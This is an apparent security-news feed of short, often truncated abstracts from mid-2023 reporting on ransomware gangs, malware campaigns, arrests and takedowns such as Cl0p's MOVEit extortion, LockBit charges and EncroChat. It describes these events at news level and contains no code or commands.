Abstract MOVEit-hijacker Cl0p ransomware gang has changed its extortion tactics and is now using torrents to distribute data stolen in the MOVEit Transfer breaches. Previously, the group utilized Tor data leak sites, but this method was slow and easier to shut down. Through torrents, criminals are expecting ... Read More

Cyware


August 7, 2023

Spyware Maker Letmespy Shuts Down After Hacker Deletes Server Data Full Text

Abstract In a notice on its website in both English and Polish, LetMeSpy confirmed the “permanent shutdown” of the spyware service and that it would cease operations by the end of August.

Cyware


August 4, 2023

Married couple pleaded guilty to laundering billions in cryptocurrency stolen from Bitfinex in 2016 Full Text

Abstract A married couple from New York pleaded guilty this week to laundering billions of dollars stolen from Bitfinex in 2016. The couple pleaded guilty to money laundering charges in connection with the hack of the cryptocurrency stock exchange Bitfinex...

Security Affairs


August 02, 2023

Iranian Company Cloudzy Accused of Aiding Cybercriminals and Nation-State Hackers Full Text

Abstract Services offered by an obscure Iranian company known as Cloudzy are being leveraged by multiple threat actors, including cybercrime groups and nation-state crews. "Although Cloudzy is incorporated in the United States, it almost certainly operates out of Tehran, Iran – in possible violation of U.S. sanctions – under the direction of someone going by the name Hassan Nozari," Halcyon said in a new report published Tuesday. The Texas-based cybersecurity firm said the company acts as a command-and-control provider (C2P), which provides attackers with Remote Desktop Protocol (RDP) virtual private servers and other anonymized services that ransomware affiliates and others use to pull off the cybercriminal endeavors. "[C2Ps] enjoy a liability loophole that does not require them to ensure that the infrastructure they provide is not being used for illegal operations," Halcyon said in a statement shared with The Hacker News. The ransomware-as-a-service (RaaS) busine

The Hacker News


August 01, 2023

Researchers Expose Space Pirates’ Cyber Campaign Across Russia and Serbia Full Text

Abstract The threat actor known as Space Pirates has been linked to attacks against at least 16 organizations in Russia and Serbia over the past year by employing novel tactics and adding new cyber weapons to its arsenal. "The cybercriminals' main goals are still espionage and theft of confidential information, but the group has expanded its interests and the geography of its attacks," Positive Technologies said in a deep dive report published last week. Targets comprise government agencies, educational institutions, private security companies, aerospace manufacturers, agricultural producers, defense, energy, and healthcare firms in Russia and Serbia. Space Pirates was first exposed by the Russian cybersecurity company in May 2022, highlighting its attacks on the aerospace sector in the nation. The group, said to be active since at least late 2019, has links to another adversary tracked by Symantec as Webworm. Positive Technologies' analysis of the attack infrast

The Hacker News


August 01, 2023

Cybercriminals Renting WikiLoader to Target Italian Organizations with Banking Trojan Full Text

Abstract Organizations in Italy are the target of a new phishing campaign that leverages a new strain of malware called WikiLoader with an ultimate aim to install a banking trojan, stealer, and spyware referred to as Ursnif (aka Gozi). "It is a sophisticated downloader with the objective of installing a second malware payload," Proofpoint said in a technical report. "The malware uses multiple mechanisms to evade detection and was likely developed as a malware that can be rented out to select cybercriminal threat actors." WikiLoader is so named due to the malware making a request to Wikipedia and checking that the response has the string "The Free." The enterprise security firm said it first detected the malware in the wild on December 27, 2022, in connection with an intrusion set mounted by a threat actor it tracks as TA544, which is also known as Bamboo Spider and Zeus Panda. The campaigns are centered around the use of emails containing either Micro

The Hacker News


July 27, 2023

China Allegedly Turns to Transnational Criminals to Spread Disinformation in Australia Full Text

Abstract Australian researchers have found evidence that China is using fake social media accounts linked to transnational criminal groups to spread online propaganda and disinformation.

Cyware


July 26, 2023

Fenix Cybercrime Group Poses as Tax Authorities to Target Latin American Users Full Text

Abstract Tax-paying individuals in Mexico and Chile have been targeted by a Mexico-based cybercrime group that goes by the name Fenix to breach targeted networks and steal valuable data. A key hallmark of the operation entails cloning official portals of the Servicio de Administración Tributaria (SAT) in Mexico and the Servicio de Impuestos Internos (SII) in Chile and redirecting potential victims to those sites. "These fake websites prompt users to download a supposed security tool, claiming it will enhance their portal navigation safety," Metabase Q security researchers Gerardo Corona and Julio Vidal said in a recent analysis. "However, unbeknownst to the victims, this download actually installs the initial stage of malware, ultimately enabling the theft of sensitive information such as credentials." The goal of Fenix, according to the Latin America-focused cybersecurity firm, is to act as an initial access broker and get a foothold into different companies in t

The Hacker News


July 26, 2023

FraudGPT: The Villain Avatar of ChatGPT Full Text

Abstract Cybercriminals are using artificial intelligence tools like FraudGPT to create sophisticated phishing attacks and other malicious activities, posing a significant threat to organizations.

Cyware


July 19, 2023

Exploring the Dark Side: OSINT Tools and Techniques for Unmasking Dark Web Operations Full Text

Abstract On April 5, 2023, the FBI and Dutch National Police announced the takedown of Genesis Market, one of the largest dark web marketplaces. The operation, dubbed "Operation Cookie Monster," resulted in the arrest of 119 people and the seizure of over $1M in cryptocurrency. You can read the FBI's warrant here for details specific to this case. In light of these events, I'd like to discuss how OSINT can assist with dark web investigations. The Dark Web's anonymity attracts a variety of users, from whistleblowers and political activists to cybercriminals and terrorists. There are several techniques that can be used to try and identify the individuals behind these sites and personas. Technical Vulnerabilities: While not considered OSINT, there have been instances when technical vulnerabilities have existed in the technology used to host dark websites. These vulnerabilities may exist in the software itself or be due to misconfigurations, but they can sometimes revea

The Hacker News


July 19, 2023

Ukraine Police Bust Another Bot Farm Accused of Pro-Russia Propaganda, Internet Fraud Full Text

Abstract Ukraine's Cyber Police shut down yet another bot farm that was reportedly spreading disinformation about the war in Ukraine on social media, just one month after a similar illicit operation was raided in west-central Ukraine.

Cyware


July 18, 2023

FIN8 Group spotted delivering the BlackCat Ransomware Full Text

Abstract The cybercrime group FIN8 is using a revamped version of the Sardonic backdoor to deliver the BlackCat ransomware. The financially motivated group FIN8 (aka Syssphinx) was spotted using a revamped version of a backdoor tracked as Sardonic to deliver...

Security Affairs


July 18, 2023

Black Hat Hacker Exposes Real Identity After Infecting Own Computer With Malware Full Text

Abstract Using the online moniker ‘La_Citrix’, the threat actor has been active on Russian-speaking cybercrime forums since 2020, offering access to hacked companies and info-stealer logs from active infections.

Cyware


July 18, 2023

Go Beyond the Headlines for Deeper Dives into the Cybercriminal Underground Full Text

Abstract Discover stories about threat actors' latest tactics, techniques, and procedures from Cybersixgill's threat experts each month. Each story brings you details on emerging underground threats, the threat actors involved, and how you can take action to mitigate risks. Learn about the top vulnerabilities and review the latest ransomware and malware trends from the deep and dark web. Stolen ChatGPT credentials flood dark web markets Over the past year, 100,000 stolen credentials for ChatGPT were advertised on underground sites, being sold for as little as $5 on dark web marketplaces in addition to being offered for free. Stolen ChatGPT credentials include usernames, passwords, and other personal information associated with accounts. This is problematic because ChatGPT accounts may store sensitive information from queries, including confidential data and intellectual property. Specifically, companies increasingly incorporate ChatGPT into daily workflows, which means employees may disclose

The Hacker News


July 18, 2023

FIN8 Group Using Modified Sardonic Backdoor for BlackCat Ransomware Attacks Full Text

Abstract The financially motivated threat actor known as FIN8 has been observed using a "revamped" version of a backdoor called Sardonic to deliver the BlackCat ransomware. According to the Symantec Threat Hunter Team, part of Broadcom, the development is an attempt on the part of the e-crime group to diversify its focus and maximize profits from infected entities. The intrusion attempt took place in December 2022. FIN8 is being tracked by the cybersecurity company under the name Syssphinx. Known to be active since at least 2016, the adversary was originally attributed to attacks targeting point-of-sale (PoS) systems using malware such as PUNCHTRACK and BADHATCH. The group resurfaced after more than a year in March 2021 with an updated version of BADHATCH, following it up with a completely new bespoke implant called Sardonic, which was disclosed by Bitdefender in August 2021. "The C++-based Sardonic backdoor has the ability to harvest system information and execute co

The Hacker News


July 18, 2023

Cybercriminals Exploiting WooCommerce Payments Plugin Flaw to Hijack Websites Full Text

Abstract Threat actors are actively exploiting a recently disclosed critical security flaw in the WooCommerce Payments WordPress plugin as part of a massive targeted campaign. The flaw, tracked as CVE-2023-28121 (CVSS score: 9.8), is a case of authentication bypass that enables unauthenticated attackers to impersonate arbitrary users and perform some actions as the impersonated user, including an administrator, potentially leading to site takeover. "Large-scale attacks against the vulnerability, assigned CVE-2023-28121, began on Thursday, July 14, 2023 and continued over the weekend, peaking at 1.3 million attacks against 157,000 sites on Saturday, July 16, 2023," Wordfence security researcher Ram Gall said in a Monday post. Versions 4.8.0 through 5.6.1 of WooCommerce Payments are vulnerable. The plugin is installed on over 600,000 sites. Patches for the bug were released by WooCommerce back in March 2023, with WordPress issuing auto-updates to sites using affected versions of

The Hacker News


July 17, 2023

Admins of Genesis Market marketplace sold their infrastructure on a hacker forum Full Text

Abstract The admins of the darkweb Genesis Market announced the sale of their platform to a threat actor that will restart operations next month. In April, the FBI seized the Genesis Market, a black marketplace for stolen credentials that was launched in 2017....

Security Affairs


July 17, 2023

Cybercriminals Exploit Microsoft Word Vulnerabilities to Deploy LokiBot Malware Full Text

Abstract Microsoft Word documents exploiting known remote code execution flaws are being used as phishing lures to drop malware called LokiBot on compromised systems. "LokiBot, also known as Loki PWS, has been a well-known information-stealing Trojan active since 2015," Fortinet FortiGuard Labs researcher Cara Lin said. "It primarily targets Windows systems and aims to gather sensitive information from infected machines." The cybersecurity company, which spotted the campaign in May 2023, said the attacks take advantage of CVE-2021-40444 and CVE-2022-30190 (aka Follina) to achieve code execution. The Word file that weaponizes CVE-2021-40444 contains an external GoFile link embedded within an XML file that leads to the download of an HTML file, which exploits Follina to download a next-stage payload, an injector module written in Visual Basic that decrypts and launches LokiBot. The injector also features evasion techniques to check for the presence of debuggers a

The Hacker News


July 15, 2023

WormGPT: New AI Tool Allows Cybercriminals to Launch Sophisticated Cyber Attacks Full Text

Abstract With generative artificial intelligence (AI) becoming all the rage these days, it's perhaps not surprising that the technology has been repurposed by malicious actors to their own advantage, enabling avenues for accelerated cybercrime. According to findings from SlashNext, a new generative AI cybercrime tool called WormGPT has been advertised on underground forums as a way for adversaries to launch sophisticated phishing and business email compromise (BEC) attacks. "This tool presents itself as a blackhat alternative to GPT models, designed specifically for malicious activities," security researcher Daniel Kelley said. "Cybercriminals can use such technology to automate the creation of highly convincing fake emails, personalized to the recipient, thus increasing the chances of success for the attack." The author of the software has described it as the "biggest enemy of the well-known ChatGPT" that "lets you do all sorts of illegal stuff.

The Hacker News


July 13, 2023

Criminals Target Businesses With Malicious Extension for Meta’s Ads Manager and Accidentally Leak Stolen Accounts Full Text

Abstract The Vietnamese threat actors are using malicious Chrome extensions to steal Facebook account credentials, with over 800 victims worldwide and $180K in compromised ad budget.

Cyware


July 12, 2023

Staying ahead of the “professionals”: The service-oriented ransomware crime industry Full Text

Abstract The total amount of ransom paid since 2020 is estimated to be at least $2 billion, and this has both motivated and enabled the groups who are profiting from this activity to become more professional.

Cyware


July 12, 2023

Cl0p hacker operating from Russia-Ukraine war front line – exclusive Full Text

Abstract CyberNews researchers discovered that at least one of the Cl0p ransomware gang masterminds is still residing in Ukraine. Original post at: https://cybernews.com/security/cl0p-hacker-hides-in-ukraine/ As the Cl0p ransomware gang continues to sow anxiety...

Security Affairs


July 12, 2023

Cl0p Crime Group Adds 62 Ernst & Young Clients to Leak Sites Full Text

Abstract The growing list of MOVEit cyberattack victims has grown. Sixty-two clients of Big Four accounting firm Ernst & Young now appear on the Clop ransomware group's data leak sites.

Cyware


July 11, 2023

Cybercriminals Evolve Antidetect Tooling for Mobile OS-Based Fraud Full Text

Abstract Resecurity identified the emergence of adversarial mobile Android-based Antidetect Tooling for Mobile OS-Based Fraud. Resecurity has identified the emergence of adversarial mobile Android-based tools (called "mobile anti-detects"), like Enclave and McFly,...

Security Affairs


July 10, 2023

Genesis Market gang tries to sell platform after FBI disruption Full Text

Abstract Unlike its competitors, Genesis Market did not just sell stolen data and credentials but also provided a platform to criminals that allowed them to weaponize that data using a custom browser extension to impersonate victims.

Cyware


July 10, 2023

Hackers Steal $20 Million by Exploiting Flaw in Revolut’s Payment Systems Full Text

Abstract Malicious actors exploited an unknown flaw in Revolut's payment systems to steal more than $20 million of the company's funds in early 2022. The development was reported by the Financial Times, citing multiple unnamed sources with knowledge of the incident. The breach has not been disclosed publicly. The fault stemmed from discrepancies between Revolut's U.S. and European systems, causing funds to be erroneously refunded using its own money when some transactions were declined. The problem was first detected in late 2021. But before it could be closed, the report said organized criminal groups leveraged the loophole by "encouraging individuals to try to make expensive purchases that would go on to be declined." The refunded amounts would then be withdrawn from ATMs. The exact technical details associated with the flaw are currently unclear. About $23 million was stolen in total, with some funds recovered by pursuing those who had withdrawn cash. The mass

The Hacker News


July 06, 2023

INTERPOL Nabs Hacking Crew OPERA1ER’s Leader Behind $11 Million Cybercrime Full Text

Abstract A suspected senior member of a French-speaking hacking crew known as OPERA1ER has been arrested as part of an international law enforcement operation codenamed Nervone, Interpol has announced. "The group is believed to have stolen an estimated USD 11 million -- potentially as much as 30 million -- in more than 30 attacks across 15 countries in Africa, Asia, and Latin America," the agency said. The arrest was made by authorities in Côte d'Ivoire early last month. Additional insight was provided by the U.S. Secret Service's Criminal Investigative Division and Booz Allen Hamilton DarkLabs. The financially motivated collective is also known by the aliases Common Raven, DESKTOP-GROUP, and NX$M$. Its modus operandi was first exposed by Group-IB and Orange CERT Coordination Center (Orange-CERT-CC) in November 2022, detailing its intrusions on banks, financial services, and telecom companies between March 2018 and October 2022. Earlier this January, Broadcom's S

The Hacker News


July 5, 2023

Ransomware Criminals Are Dumping Kids’ Private Files Online After School Hacks Full Text

Abstract Complete sexual assault case folios containing these details were among more than 300,000 files dumped online in March after the 36,000-student Minneapolis Public Schools refused to pay a $1 million ransom.

Cyware


July 5, 2023

Teen among suspects arrested in Android banking malware scheme Full Text

Abstract Preliminary findings suggest that seven men, two women aged 19 to 27, and a 16-year-old facilitated the scam by providing their bank accounts, Internet banking credentials, and Singpass credentials to perpetrators for monetary gain.

Cyware


July 4, 2023

Neo_Net runs eCrime campaign targeting clients of banks globally Full Text

Abstract A Mexican threat actor that goes online with the moniker Neo_Net is behind an Android malware campaign targeting banks worldwide. A joint study conducted by vx-underground and SentinelOne recently revealed that a Mexican threat actor that goes online...

Security Affairs


July 04, 2023

Mexico-Based Hacker Targets Global Banks with Android Malware Full Text

Abstract An e-crime actor of Mexican provenance has been linked to an Android mobile malware campaign targeting financial institutions globally, but with a specific focus on Spanish and Chilean banks, from June 2021 to April 2023. The activity is being attributed to an actor codenamed Neo_Net, according to security researcher Pol Thill. The findings were published by SentinelOne following a Malware Research Challenge in collaboration with vx-underground. "Despite using relatively unsophisticated tools, Neo_Net has achieved a high success rate by tailoring their infrastructure to specific targets, resulting in the theft of over 350,000 EUR from victims' bank accounts and compromising Personally Identifiable Information (PII) of thousands of victims," Thill said. Some of the major targets include banks such as Santander, BBVA, CaixaBank, Deutsche Bank, Crédit Agricole, and ING. Neo_Net, linked to a Spanish-speaking actor residing in Mexico, has established themselves as a

The Hacker News


July 4, 2023

Anonymous Sudan Claims to Have Stolen 30 Million Microsoft’s Customer Accounts Full Text

Abstract Attackers said “We announce that we have successfully hacked Microsoft and have access to a large database containing more than 30 million Microsoft accounts, email and password. Price for full database : 50,000 USD.”

Cyware


July 03, 2023

BlackCat Operators Distributing Ransomware Disguised as WinSCP via Malvertising Full Text

Abstract Threat actors associated with the BlackCat ransomware have been observed employing malvertising tricks to distribute rogue installers of the WinSCP file transfer application. "Malicious actors used malvertising to distribute a piece of malware via cloned webpages of legitimate organizations," Trend Micro researchers said in an analysis published last week. "In this case, the distribution involved a webpage of the well-known application WinSCP, an open-source Windows application for file transfer." Malvertising refers to the use of SEO poisoning techniques to spread malware via online advertising. It typically involves hijacking a chosen set of keywords to display bogus ads on Bing and Google search results pages with the goal of redirecting unsuspecting users to sketchy pages. The idea is to trick users searching for applications like WinSCP into downloading malware, in this instance, a backdoor that contains a Cobalt Strike Beacon that connects to a

The Hacker News


July 1, 2023

LockBit gang demands a $70 million ransom to the semiconductor manufacturing giant TSMC Full Text

Abstract The LockBit ransomware gang claims to have hacked Taiwan Semiconductor Manufacturing Company (TSMC). The LockBit ransomware group this week claimed to have hacked the Taiwan Semiconductor Manufacturing Company (TSMC) and demanded a $70 million ransom. TSMC...

Security Affairs


June 30, 2023

Cybercriminals Hijacking Vulnerable SSH Servers in New Proxyjacking Campaign Full Text

Abstract An active financially motivated campaign is targeting vulnerable SSH servers to covertly ensnare them into a proxy network. "This is an active campaign in which the attacker leverages SSH for remote access, running malicious scripts that stealthily enlist victim servers into a peer-to-peer (P2P) proxy network, such as Peer2Profit or Honeygain," Akamai researcher Allen West said in a Thursday report. Unlike cryptojacking, in which a compromised system's resources are used to illicitly mine cryptocurrency, proxyjacking offers the ability for threat actors to leverage the victim's unused bandwidth to covertly run different services as a P2P node. This offers two-fold benefits: It not only enables the attacker to monetize the extra bandwidth with a significantly reduced resource load that would be necessary to carry out cryptojacking, it also reduces the chances of discovery. "It is a stealthier alternative to cryptojacking and has serious implications that ca

The Hacker News


June 29, 2023

Former Group-IB manager has been arrested in Kazakhstan Full Text

Abstract The former head of network security at Group-IB has been arrested in Kazakhstan based on a request from U.S. law enforcement. Nikita Kislitsin who worked as the head of network security at Group-IB, as well as its Russian-based spinoff company (known...

Security Affairs


June 29, 2023

Security analyst wanted by both Russia and the US Full Text

Abstract A Russian network security specialist and former editor of Hacker magazine who is wanted by the US and Russia on cybercrime charges has been detained in Kazakhstan as the two governments seek his extradition.

Cyware


June 28, 2023

CryptosLabs Scam Ring Targets French-Speaking Investors, Rakes in €480 Million Full Text

Abstract Cybersecurity researchers have exposed the workings of a scam ring called CryptosLabs that's estimated to have made €480 million in illegal profits by targeting French-speaking individuals in France, Belgium, and Luxembourg since April 2018. The syndicate's massive fake investment schemes primarily involve impersonating 40 well-known banks, fin-techs, asset management firms, and crypto platforms, setting up a scam infrastructure spanning over 350 domains hosted on more than 80 servers, Group-IB said in a deep-dive report. The Singapore-headquartered company described the criminal outfit as "operated by a hierarchy of kingpins, sales agents, developers, and call center operators" who are recruited to ensnare potential victims by promising high returns on their capital. "CryptoLabs made their scam schemes more convincing through region-focused tactics, such as hiring French-speaking callers as 'managers' and creating fake landing pages, socia

The Hacker News


June 28, 2023

EncroChat dismantling led to 6,558 arrests and the seizure of $979M in criminal funds Full Text

Abstract Europol announced that the takedown of the EncroChat encrypted chat network has led to the arrest of 6,558 people and the seizure of $979 million in illicit funds. Europol announced that the dismantling of the encrypted chat network EncroChat has led to the arrest...

Security Affairs


June 28, 2023

8Base ransomware gang escalates double extortion attacks in June Full Text

Abstract The 8Base ransomware gang is targeting organizations worldwide in double-extortion attacks, with a steady stream of new victims since the beginning of June.

BleepingComputer


June 27, 2023

EncroChat takedown led to 6,500 arrests and $979 million seized Full Text

Abstract Europol announced today that the takedown of the EncroChat encrypted mobile communications platform has led to the arrest of over 6,600 people and the seizure of $979 million in illicit funds.

BleepingComputer


June 27, 2023

EncroChat Bust Leads to 6,558 Criminals’ Arrests and €900 Million Seizure Full Text

Abstract Europol on Tuesday announced that the takedown of EncroChat in July 2020 led to 6,558 arrests worldwide and the seizure of €900 million in illicit criminal proceeds. The law enforcement agency said that a subsequent joint investigation initiated by French and Dutch authorities intercepted and analyzed over 115 million conversations that took place over the encrypted messaging platform between no less than 60,000 users. Now almost three years later, the information obtained from digital correspondence has resulted in:
- Arrests of 6,558 suspects, including 197 high-value targets
- 7,134 years of imprisonment of convicted criminals
- Confiscation of €739.7 million in cash
- Freeze of €154.1 million in assets or bank accounts
- Seizure of 30.5 million pills of chemical drugs
- Seizure of 103.5 tonnes of cocaine, 163.4 tonnes of cannabis, and 3.3 tonnes of heroin
- Seizure of 971 vehicles, 83 boats, and 40 planes
- Seizure of 271 estates or homes, and
- Seizure of 923 weapons, as well

The Hacker News


June 26, 2023

Cybercriminals target high-profit companies: AEI Full Text

Abstract Cybercriminals tend to strike highly profitable companies, those holding abundant cash, and organizations that spend generously on advertising, according to an American Enterprise Institute study of cyberattacks from January 1999 until January 2022.

Cyware


June 24, 2023

Twitter Hacker Sentenced to 5 Years in Prison for $120,000 Crypto Scam Full Text

Abstract A U.K. citizen who took part in the massive July 2020 hack of Twitter has been sentenced to five years in prison in the U.S. Joseph James O'Connor (aka PlugwalkJoe), 24, was awarded the sentence on Friday in the Southern District of New York, a little over a month after he pleaded guilty to the criminal schemes. He was arrested in Spain in July 2021. The infamous Twitter breach allowed the defendant and his co-conspirators to obtain unauthorized access to backend tools used by Twitter, abusing them to hijack 130 popular accounts to perpetrate a crypto scam that netted them about $120,000 in illegal profits. "In other instances, the co-conspirators sold access to Twitter accounts to others," the U.S. Department of Justice (DoJ) said. "O'Connor communicated with others regarding purchasing unauthorized access to a variety of Twitter accounts, including accounts associated with public figures around the world." The defendant has also been accused o

The Hacker News


June 23, 2023

Cybercrime Group ‘Muddled Libra’ Targets BPO Sector with Advanced Social Engineering Full Text

Abstract A threat actor known as Muddled Libra is targeting the business process outsourcing (BPO) industry with persistent attacks that leverage advanced social engineering ploys to gain initial access. "The attack style defining Muddled Libra appeared on the cybersecurity radar in late 2022 with the release of the 0ktapus phishing kit, which offered a prebuilt hosting framework and bundled templates," Palo Alto Networks Unit 42 said in a technical report. Libra is the designation given by the cybersecurity company for cybercrime groups. The "muddled" moniker for the threat actor stems from the prevailing ambiguity with regards to the use of the 0ktapus framework. 0ktapus, also known as Scatter Swine, refers to an intrusion set that first came to light in August 2022 in connection with smishing attacks against over 100 organizations, including Twilio and Cloudflare. Then in late 2022, CrowdStrike detailed a string of cyber assaults aimed at telecom and BPO co

The Hacker News


June 19, 2023

Diicot cybercrime gang expands its attack capabilities Full Text

Abstract Researchers found evidence that Diicot threat actors are expanding their capabilities with new payloads and the Cayosin Botnet. Cado researchers recently detected an interesting attack pattern linked to an emerging cybercrime group tracked as Diicot...

Security Affairs


June 18, 2023

Reddit Files: BlackCat/ALPHV ransomware gang claims to have stolen 80GB of data from Reddit Full Text

Abstract The BlackCat/ALPHV ransomware gang claims to have stolen 80GB of data from Reddit in a February cyberattack. In February, the social news aggregation platform Reddit suffered a security breach, attackers gained unauthorized access to internal documents,...

Security Affairs


June 17, 2023

Law enforcement shut down a long-standing DDoS-for-hire service Full Text

Abstract Polish police, as part of the international law enforcement operation PowerOFF, dismantled a DDoS-for-hire service that has been active since at least 2013. An international operation codenamed PowerOff led to the shutdown of a DDoS-for-hire service...

Security Affairs


June 16, 2023

A Russian national charged for committing LockBit Ransomware attacks Full Text

Abstract DoJ charged a Russian national with conspiring to carry out LockBit ransomware attacks against U.S. and foreign businesses. The Justice Department announced charges against the Russian national Ruslan Magomedovich Astamirov (20) for his role in numerous...

Security Affairs


June 16, 2023

20-Year-Old Russian LockBit Ransomware Affiliate Arrested in Arizona Full Text

Abstract The U.S. Department of Justice (DoJ) on Thursday unveiled charges against a Russian national for his alleged involvement in deploying LockBit ransomware to targets in the U.S., Asia, Europe, and Africa. Ruslan Magomedovich Astamirov, 20, of the Chechen Republic has been accused of perpetrating at least five attacks between August 2020 and March 2023. He was arrested in the state of Arizona last month. "Astamirov allegedly participated in a conspiracy with other members of the LockBit ransomware campaign to commit wire fraud and to intentionally damage protected computers and make ransom demands through the use and deployment of ransomware," the DoJ said. Astamirov, as part of his LockBit-related activities, managed various email addresses, IP addresses, and other online accounts to deploy the ransomware and communicate with the victims. Law enforcement agencies said they were able to trace a chunk of an unnamed victim's ransom payment to a virtual currency address operated by Astam

The Hacker News


June 15, 2023

LockBit Ransomware Extorts $91 Million from U.S. Companies Full Text

Abstract The threat actors behind the LockBit ransomware-as-a-service (RaaS) scheme have extorted $91 million following hundreds of attacks against numerous U.S. organizations since 2020. That's according to a joint bulletin published by the U.S. Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), the Multi-State Information Sharing and Analysis Center (MS-ISAC), and other partner authorities from Australia, Canada, France, Germany, New Zealand, and the U.K. "The LockBit ransomware-as-a-service (RaaS) attracts affiliates to use LockBit for conducting ransomware attacks, resulting in a large web of unconnected threat actors conducting wildly varying attacks," the agencies said. LockBit, which first burst onto the scene in late 2019, has continued to be disruptive and prolific, targeting as many as 76 victims in May 2023 alone, per statistics shared by Malwarebytes last week. The Russia-linked cartel has claimed responsibil

The Hacker News


June 13, 2023

Two Russian Nationals Charged for Masterminding Mt. Gox Crypto Exchange Hack Full Text

Abstract The U.S. Department of Justice (DoJ) has charged two Russian nationals in connection with masterminding the 2014 digital heist of the now-defunct cryptocurrency exchange Mt. Gox. According to unsealed indictments released last week, Alexey Bilyuchenko, 43, and Aleksandr Verner, 29, have been accused of conspiring to launder approximately 647,000 bitcoins stolen from September 2011 through at least May 2014 as a result of unauthorized access to a server holding crypto wallets used by Mt. Gox customers. "Starting in 2011, Bilyuchenko and Verner stole a massive amount of cryptocurrency from Mt. Gox, contributing to the exchange's ultimate insolvency," Assistant Attorney General Kenneth A. Polite, Jr. said in a statement. "Armed with the ill-gotten gains from Mt. Gox, Bilyuchenko allegedly went on to help set up the notorious BTC-e virtual currency exchange, which laundered funds for cyber criminals worldwide." Bilyuchenko and Verner are also alleged to hav

The Hacker News


June 12, 2023

Cybercriminals Using Powerful BatCloak Engine to Make Malware Fully Undetectable Full Text

Abstract A fully undetectable (FUD) malware obfuscation engine named BatCloak is being used to deploy various malware strains since September 2022, while persistently evading antivirus detection. The samples grant "threat actors the ability to load numerous malware families and exploits with ease through highly obfuscated batch files," Trend Micro researchers said. About 79.6% of the total 784 artifacts unearthed have no detection across all security solutions, the cybersecurity firm added, highlighting BatCloak's ability to circumvent traditional detection mechanisms. The BatCloak engine forms the crux of an off-the-shelf batch file builder tool called Jlaive, which comes with capabilities to bypass Antimalware Scan Interface (AMSI) as well as compress and encrypt the primary payload to achieve heightened security evasion. The open-source tool, although taken down since it was made available via GitHub and GitLab in September 2022 by a developer named ch2sh, has been

The Hacker News


June 09, 2023

Asylum Ambuscade: A Cybercrime Group with Espionage Ambitions Full Text

Abstract The threat actor known as Asylum Ambuscade has been observed straddling cybercrime and cyber espionage operations since at least early 2020. "It is a crimeware group that targets bank customers and cryptocurrency traders in various regions, including North America and Europe," ESET said in an analysis published Thursday. "Asylum Ambuscade also does espionage against government entities in Europe and Central Asia." Asylum Ambuscade was first documented by Proofpoint in March 2022 as a nation-state-sponsored phishing campaign that targeted European governmental entities in an attempt to obtain intelligence on refugee and supply movement in the region. The goal of the attackers, per the Slovak cybersecurity firm, is to siphon confidential information and web email credentials from official government email portals. The attacks start off with a spear-phishing email bearing a malicious Excel spreadsheet attachment that, when opened, either exploits VBA code o

The Hacker News


June 9, 2023

Clop ransomware gang was testing MOVEit Transfer bug since 2021 Full Text

Abstract Researchers discovered that the Clop ransomware gang had been looking for a zero-day exploit in MOVEit Transfer since 2021. Kroll security experts discovered that the Clop ransomware gang was looking for a zero-day exploit in MOVEit Transfer since...

Security Affairs


June 8, 2023

Asylum Ambuscade: crimeware or cyberespionage? Full Text

Abstract The group targets bank customers and cryptocurrency traders in various regions, including North America and Europe, as well as government entities in Europe and Central Asia.

Cyware


June 7, 2023

Clop ransomware gang claims the hack of hundreds of victims exploiting MOVEit Transfer bug Full Text

Abstract Clop ransomware group claims to have hacked hundreds of companies globally by exploiting MOVEit Transfer vulnerability. The Clop ransomware group may have compromised hundreds of companies worldwide by exploiting a vulnerability in MOVEit Transfer...

Security Affairs


June 7, 2023

0mega ransomware gang changes tactics Full Text

Abstract A number of ransomware gangs have stopped using malware to encrypt targets’ files and have switched to a data theft/extortion approach to get paid; 0mega – a low-profile and seemingly not very active threat actor – seems to be among them.

Cyware


June 7, 2023

Clop Ransomware Group Issues Extortion Notice to ‘Hundreds’ of Victims Full Text

Abstract Potentially hundreds of companies globally are being extorted by the Clop ransomware group after it exploited a vulnerability in the file transfer tool MOVEit to break into computer networks around the world and steal sensitive information.

Cyware


June 6, 2023

Cybercriminals target C-suite, family members with sophisticated attacks Full Text

Abstract Senior corporate executives are increasingly being targeted by sophisticated cyberattacks that target their corporate and home office environments and even extend to family members, according to a study from BlackCloak and Ponemon Institute.

Cyware


June 6, 2023

Cyclops Ransomware group offers a multiplatform Info Stealer Full Text

Abstract Researchers from security firm Uptycs reported that threat actors linked to the Cyclops ransomware are offering a Go-based information stealer. The Cyclops group has developed multi-platform ransomware that can infect Windows, Linux, and macOS...

Security Affairs


June 5, 2023

Microsoft blames Clop ransomware gang for ‘MOVEit Transfer’ attacks Full Text

Abstract Microsoft attributes the recent campaign exploiting a zero-day in the MOVEit Transfer platform to the Clop ransomware gang. The Clop ransomware gang (aka Lace Tempest) is credited by Microsoft for the recent campaign that exploits a zero-day vulnerability,...

Security Affairs


June 05, 2023

Brazilian Cybercriminals Using LOLBaS and CMD Scripts to Drain Bank Accounts Full Text

Abstract An unknown cybercrime threat actor has been observed targeting Spanish- and Portuguese-speaking victims to compromise online banking accounts in Mexico, Peru, and Portugal. "This threat actor employs tactics such as LOLBaS (living-off-the-land binaries and scripts), along with CMD-based scripts to carry out its malicious activities," the BlackBerry Research and Intelligence Team said in a report published last week. The cybersecurity company attributed the campaign, dubbed Operation CMDStealer, to a Brazilian threat actor based on an analysis of the artifacts. The attack chain primarily leverages social engineering, banking on Portuguese and Spanish emails containing tax- or traffic violation-themed lures to trigger the infections and gain unauthorized access to victims' systems. The emails come fitted with an HTML attachment that contains obfuscated code to fetch the next-stage payload from a remote server in the form of a RAR archive file. The files, which are

The Hacker News


June 5, 2023

Spanish bank Globalcaja confirms Play ransomware attack Full Text

Abstract Play ransomware group claims responsibility for a ransomware attack that hit Globalcaja, one of the major banks in Spain. Globalcaja is a financial institution in the autonomous community of Castilla-La Mancha; it has more than 300 offices across...

Security Affairs


June 01, 2023

Unmasking XE Group: Experts Reveal Identity of Suspected Cybercrime Kingpin Full Text

